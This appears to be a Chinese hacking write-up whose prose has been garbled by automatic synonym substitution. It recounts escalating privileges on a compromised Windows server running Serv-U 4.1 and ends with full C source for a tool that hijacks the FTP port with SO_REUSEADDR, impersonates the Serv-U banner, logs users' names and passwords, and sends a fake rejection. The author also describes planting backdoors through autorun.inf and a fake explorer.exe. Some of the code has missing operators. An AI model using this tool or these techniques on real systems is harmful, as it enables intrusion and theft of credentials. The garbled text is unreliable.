利用ftp服务程序本身设计的缺陷取得最高权限

运用ftp效劳步调自己安排的"缺点"博得最高权力一台假造长机,ntfs文献体例,长机重要运转的效劳为iis和serv-u.仍旧经过承诺上传asp文献并实行那些as文献的题目获得了普遍的user权力.因为处置员对目次的树立比拟安定,惟有c盘的根目次具备写权力,其它目次都惟有读的权力.因为摆设的安定性,用本人的方便之门步调替代掉效劳启用的步调那一招仍旧不灵了,向serv-u的摆设文献介入一个有实行权力的帐户这一招也行不通了.侵犯的那位伙伴仍旧试过多种本领,没有一个可行的本领,所以他将这台侵犯了一少数的体例pass给了我,看我有没有本领处置.(这位伙伴一天除去用饭和安排外,就在对着电脑四处找新缺点侵犯体例,常常有些八怪七喇的体例给我看) 处置计划是从serv-u何处想方法,由于那位伙伴也试过好几种本领了,那些本领1.上传个autorun.inf和方便之门上去硬盘根目次,(即使体例承诺autorun的话,处置员看根目次时就会实行autorun.inf里设置的步调)2.上传方便之门到硬盘根目次,更名为explorer.exe(很久的货色,windows探求文献时是先从根目次先搜起的,即使在根目次先搜到,就实行谁人文献.即使体例还生存这题目,即使处置员双击"我的电脑",就会实行了根目次下的谁人方便之门的explorer.exe)3.再有其它他想到的怪僻本领都试过了,一律是没方法获得最高权力体例该当仍旧打上最新的补丁了,用多个扫描器扫描iis也没有创造到什么缺点,并且基础即是iis和serv-u这两个效劳可运用,iis是没方法的了,惟有从serv-u中发端.体例中已运转一个user权力启用的小方便之门,不过获得个user限的shell.进去后察看了一下体例的摆设和安置了的步调之类,创造了也只能在serv-u何处动动作了.serv-u是4.1本子的,内里有5个帐号,有两个帐号的是有写权力的,而且root目次是在c:\下(经过察看serv-u的谁人ini摆设文献得悉帐户的消息) ,即使能拿到个中一个帐号的暗号,咱们就具备写权力了.要害是怎样获得那两个帐号的暗号.有人会想到破暗号,这边最原始并且是在没有任何方法时才会试的方法,固然你不要憧憬有什么高的胜利时机了,大师都该当serv-u的帐号的暗号是用什么算法加密的了,并且也该当领会那种加密算法用最快的破译步调,即使要穷举一个不过8位长度的暗号是须要多长功夫的.以是不要先想着破暗号了.要获得登岸serv-u的用户的暗号,有人想到嗅探的本领,这固然是一个好本领,然而得先想想本人所处的权力(不过普遍的user权力),基础不及以实行绑入彀卡举行的无启动的的嗅探步调(已尝试过,证明不行的了) .嗅探不行,遽然想到shatter attack(有爱好的伙伴不妨看看 http://security.tombom.co.uk/shatter.html ),但看到了"any application on a given desktop can send a message to any window on the same desktop"这句, 我是从吩咐前进去用user权力运转的一个shell,犹如没有居于任何桌面,以是该当不许将消息发到serv-u的tray monitor中去.在尝试前我先发了信到serv-u的help center中咨询,主假如咨询serv-u的4.1本子能否不妨受shatter attack所感化, 收到的恢复是4.1本子不会接受以各别权力发过来的消息,serv-u的tray monitor是登岸的处置员权力实行的,而我不过user权力,这仍旧很领会说领会是不大概的,并且我也历来没有接洽和尝试过shatter attack,以是仍旧先停止了. 想来想去都没想到什么好的本领,仍旧安排不想的了,但在沐浴时却遽然想到serv-u翻开的端口是承诺重绑的(不领会是什么因为,很多好的idea都是在沐浴时想到的,囊括很多编制程序时遇到的题目偶尔都是在沐浴时想到处置本领的) .不妨重绑端口,如许我就不妨写一个步调,绑入serv-u翻开的端口,那么贯穿到serv-u端口的考证消息就会被我的步调所获得,如许就有大概获得我所须要的帐号的用户名和暗号了. 固然这个步调要"扮"得很像serv-u,比方收到贯穿时发送的是serv-u的精确banner,贯穿用户发送了用户名来时，步调也要象serv-u那么发个"331 user name okay, need password."的消息诉求输入暗号, 当用户输入暗号后,步调就给贯穿者发送一个消息,大概是说贯穿者的ip是不承诺登岸的,而后就割断贯穿者. 为了不被处置员发觉到题目,步调在获得那两个有效的帐号的个中一个的暗号后,就会从外存中退出,如许从来的serv-u就能连接平常的处事,固然步调在退出前会将获得的帐号和暗号发到我的hotmail的邮箱中去.为了保障点,将帐号和暗号备份写入到硬盘的一个文献中去(以防hotmail的效劳偶尔阻碍没辙接到邮件). 写到这边,剩下的题目即是写出谁人步调了,那不算是什么艰巨的步调,由于各个局部的货色都已经写过,以是写出来后尝试了一下就能加入处事了.步调在那体例中运转了,我就翻开了msn等着接信了.大概是半天功夫安排吧,就获得了想要的帐号和暗号了. 有了这个帐号,我就能登岸进谁人serv-u中窜改serv-u的摆设,加个有实行权力的帐号,而后用这个新加的帐号就能上传任何方便之门大概其它货色上去那体例中运转了.到了这边,体例的最高权力仍旧得手了.结束语:不妨胜利获得最高权力,这是由两个"缺点"所形成的.1.serv-u自己翻开的端口承诺重绑入(说是缺点本来有点过份,由于serv-u的安排者没有想到你的体例会被人侵犯到的).我也发信到serv-u中说领会一下这题目,蓄意serv-u新的本子翻开的端口不承诺被其它步调所重绑(本来不过多加一条龙代码就行了) 2.user权力下也不妨重绑入其它以效劳身份(local system)启用的步调的端口(说是缺点也是有点过份) .3.其它的ftp效劳步调也有大概生存这个被重绑端口后登录者的帐号和暗号被夺取的题目生存,并且其它的运用步调即使端口承诺被重绑的话,也生存这种题目,不过视乎传输的消息能否明文仍旧被强度的算法加密过罢了.端口被重绑后爆发的题目是生存已久的了,以是我不会说是我创造的,这个作品也不过随意举了一个因为端口被重绑后爆发的重要成果的例子结束. 反面所跟的步调代码,我是去掉了将帐号和暗号发送给邮箱的功效的,不过将消息生存到logfile.dat这文献中去,这是因为这类代码不会有什么人是运用来做功德的,以是在线报告也就简略了比拟好. codz: //**************************************************************************************** // version: v1.0 // coder: wineggdrop // date release: null // purpose: to hijack ftp sever's open port and steal the connector's username and pass // test platform: win 2k pro and server sp4,serv-u v4.1 // compiled on: vc++ 6.0 // others: this code is only to demonstrate the danger of an application allowing its //         communication port to be re-binded(hijack in other word). //         if your box is in a lan,don't test it on your only box since it may not work //**************************************************************************************** #include <stdio.h> #include <winsock.h> #include <windows.h> #pragma comment(lib,"wsock32.lib") socket listensocket = invalid_socket; static critical_section    cs; const  char *logfile = "c:\logfile.dat"; // function prototype declaration //------------------------------------------------------------------------------------------------------ bool  starthijack(const char *iptobind,const char *port); bool  isdigits(const char *string); bool  initsocket(); bool  createsocket(const char *iptobind,const uint listenport); bool  handleftprequest(); bool  saveinfo(const char *filename,const char *info); bool  sendsocket(const socket clientsocket,const char *message); bool  receivesocketbuffer(const socket clientsocket,char *socketbuffer,const int nsize); dword winapi ftpthread(lpvoid para); bool  retrieveftpuserandpass(const socket clientsocket); //------------------------------------------------------------------------------------------------------ // end of fucntion prototype declaration int main(int argc,char *argv[]) { if (argc != 3)        // not enough parameters {      // show the usage and example,then exit the program      printf("usage:   %s bindedip listenport\n",argv[0]);      printf("example: %s 192.168.0.1 21\n",argv[0]);      return 0; } initializecriticalsection(&cs); starthijack(argv[1],argv[2]);        // we are about to hijack the port deletecriticalsection(&cs); return 0; } //-------------------------------------------------------------------------------------------- // purpose: to create a listening socket // return type: boolean // parameters:   //           in: char uint listenport   --> the listening port //-------------------------------------------------------------------------------------------- bool createsocket(const char *iptobind,const uint listenport) { struct sockaddr_in client; listensocket = socket(af_inet, sock_stream, ipproto_tcp);        // create socket if (listensocket == invalid_socket)        // fail to create socket {      printf("fail to create socket\n");      return false; } memset(&client, 0, sizeof(client)); client.sin_family = af_inet; client.sin_port = htons(listenport); client.sin_addr.s_addr = inet_addr(iptobind); // set socket option to hijack the port(re-bind or re-use in other word) bool breuser = true; if (setsockopt(listensocket,sol_socket,so_reuseaddr,(char *)&breuser,sizeof(breuser)) != 0) {      closesocket(listensocket);      printf("fail to hijack the port\n");      return false; } // bind socket if (bind(listensocket,(const struct sockaddr *)&client,sizeof(client)) == invalid_socket) {      closesocket(listensocket);      printf("fail to bind port\n");      return false; } // listen on the port if (listen(listensocket,5) == invalid_socket) {      closesocket(listensocket);      return false; } return true; }// end of createsocket() //-------------------------------------------------------------------------------------------- // purpose: to check the parameters and start to hijack // return type: boolean // parameters:   //           in: const char *port     --> the listening port //-------------------------------------------------------------------------------------------- bool starthijack(const char *iptobind,const char *port) { if (!initsocket())        // init socket {      printf("fail to init socket\n");              return false; } if (!isdigits(port))        // check whether it's invalid port {      printf("invalid listen port\n");      return false; } uint listenport = atoi(port);        // get the port if (listenport <= 0 listenport > 65535)         {      printf("the listen port is out of bound\n");      return false; } if (!createsocket(iptobind,listenport))        // create a tcp listening socket {      printf("fail to create socket\n");/>     return false; } return handleftprequest(); }// end of starthijack() // no need to comment bool initsocket() { wsadata data; word ver; ver = makeword(2,2); return (wsastartup(ver, &data) == 0); }// end of initsocket() //-------------------------------------------------------------------------------------------- // purpose: to send buffer through socket // return type: boolean // parameters:   //           in: const socket clientsocket     --> the client connected socket //-------------------------------------------------------------------------------------------- bool sendsocket(const socket clientsocket,const char *message) { return (send(clientsocket,message,strlen(message),0) != socket_error); }// end of sendsocket() //-------------------------------------------------------------------------------------------- // purpose: to send ftp banner to the client // return type: boolean // parameters:   //           in: const socket clientsocket     --> the client connected socket //-------------------------------------------------------------------------------------------- bool sendftpbanner(const socket clientsocket) { char *sendwelcomeinfo = "220 serv-u ftp server v4.1 for winsock ready...\r\n"; return sendsocket(clientsocket,sendwelcomeinfo); }// end of sendftpbanner() //-------------------------------------------------------------------------------------------- // purpose: to receive buffer from socket // return type: boolean // parameters:   //           in: const socket clientsocket     --> the client connected socket //           in: const int nsize               --> the socketbuffer's size //          out: char  *socketbuffer           --> buffer to receive data //-------------------------------------------------------------------------------------------- bool receivesocketbuffer(const socket clientsocket,char *socketbuffer,const int nsize) { return (recv(clientsocket,socketbuffer,nsize,0) > 0); }// end of receivesocketbuffer() //-------------------------------------------------------------------------------------------- // purpose: to check whether a string only contains digits // return type: boolean // parameters:   //           in: const char *string     --> the string to be checked //-------------------------------------------------------------------------------------------- bool isdigits(const char *string) { uint i = 0; uint stringlength = strlen(string); for (i = 0;i < stringlength;i++) {      if (string[i] < 48 string[i] > 57)      {          return false;      } } return true; }// end of isdigits() //-------------------------------------------------------------------------------------------- // purpose: to save information into a file // return type: boolean // parameters:   //           in: const char *filename     --> file to store information //           in: const char *info         --> information to be stored into file //-------------------------------------------------------------------------------------------- bool saveinfo(const char *filename,const char *info) { handle hfile = null; dword dwbytes = 0 ; bool flag = false; // open a file for writing hfile = createfile(filename,                     generic_read|generic_write,                     file_share_write,                     null,                     open_always,                     file_attribute_normal,                     null                    ); if (hfile == invalid_handle_value)            // fail to open that file,something must be wrong {      return false; } setfilepointer(hfile,0,null,file_end);        // set the file pointer to the file end flag = writefile(hfile,info,strlen(info),&dwbytes,null);        // write information into that file closehandle(hfile);        // close file handle return flag;        // return the writefile status }// end of saveinfo() //-------------------------------------------------------------------------------------------- // purpose: to remove an ending enter from a string // return type: boolean // parameters:   //           in: char *string     --> string to be modified //-------------------------------------------------------------------------------------------- bool deleteenter(char *string) { uint length = strlen(string); if (string[length - 2] == '\r' string[length - 2] == '\n') {      string[length - 2] = ''; } else {      if (string[length - 1] == '\r' string[length - 1] == '\n')      {          string[length - 1] = '';      } } return true; }// end of deleteenter() //-------------------------------------------------------------------------------------------- // purpose: to handle ftp request // return type: boolean // parameters:  none //-------------------------------------------------------------------------------------------- bool handleftprequest() { dword dwthreadid; socket acceptsocket = invalid_socket; socket *clonesocket = null; while(true) {      sockaddr_in client;      int nsize = sizeof(client);      acceptsocket = accept(listensocket, (sockaddr *)&client, &nsize);      if (acceptsocket == invalid_socket)        // something is wrong about the socket      {          break;        // get to leave      }      clonesocket = (socket *)malloc(sizeof(acceptsocket));        // allocate for socket ram      if (clonesocket == null)        // not enough ram,very rare situation      {          closesocket(acceptsocket);        // close that connection          continue;              }      *clonesocket = acceptsocket;        // make a copy of accpet socket      handle hthread = createthread (null,0, (lpthread_start_routine)ftpthread,clonesocket,0, &dwthreadid);        // create a thread      if (hthread != null)      {          closehandle(hthread);      } } closesocket(listensocket); return true; }// end of handlefprequest() //-------------------------------------------------------------------------------------------- // purpose: to steal the ftp username and password // return type: boolean // parameters:   //            in: const socket clientsocket  --> the connector's socket //-------------------------------------------------------------------------------------------- bool retrieveftpuserandpass(const socket clientsocket) { const char *userok = "331 user name okay, need password.\r\n"; char buffer[max_path]; memset(buffer,0,sizeof(buffer)); if (!receivesocketbuffer(clientsocket,buffer,sizeof(buffer)))        // fail to receive username {      return false; } if (strnicmp(buffer,"user", 4) == 0)        // we get the username, store it into file {      entercriticalsection(&cs);      saveinfo(logfile,"---------------------------------------------------------------------------\r\n");      saveinfo(logfile,buffer);      leavecriticalsection(&cs); } else        // unknows command received {      return false; } if (!sendsocket(clientsocket,userok))        // fail to send information {      return false; } memset(buffer,0,max_path); if (!receivesocketbuffer(clientsocket,buffer,sizeof(buffer)))        // fail to receive password {      return false; } if (strnicmp(buffer,"pass", 4) == 0)        // we get the password, store it into file {      entercriticalsection(&cs);      saveinfo(logfile,buffer);      saveinfo(logfile,"---------------------------------------------------------------------------\r\n\r\n");      leavecriticalsection(&cs); } else        // unknows command received {      return false; } return true; }// end of retrieveftpuserandpass() //-------------------------------------------------------------------------------------------- // purpose: to handle the connector's request // return type: dword // parameters:   //            in: lpvoid para  --> the connector's socket //-------------------------------------------------------------------------------------------- dword winapi ftpthread(lpvoid para) { socket clientsocket = (*(socket *)para);        // retrieve the socket free(para);        // free the allocated ram if (!sendftpbanner(clientsocket))        // fail to send ftp banner {      closesocket(clientsocket);        // close the connection      return 1; } retrieveftpuserandpass(clientsocket);        // get the connector's username and password sendsocket(clientsocket,"530 not logged in, unauthorized ip address.\r\n");        // cheat the connector by sending this closesocket(clientsocket);        // disconnect the connector return 0; }// end of ftpthread() // end of file?>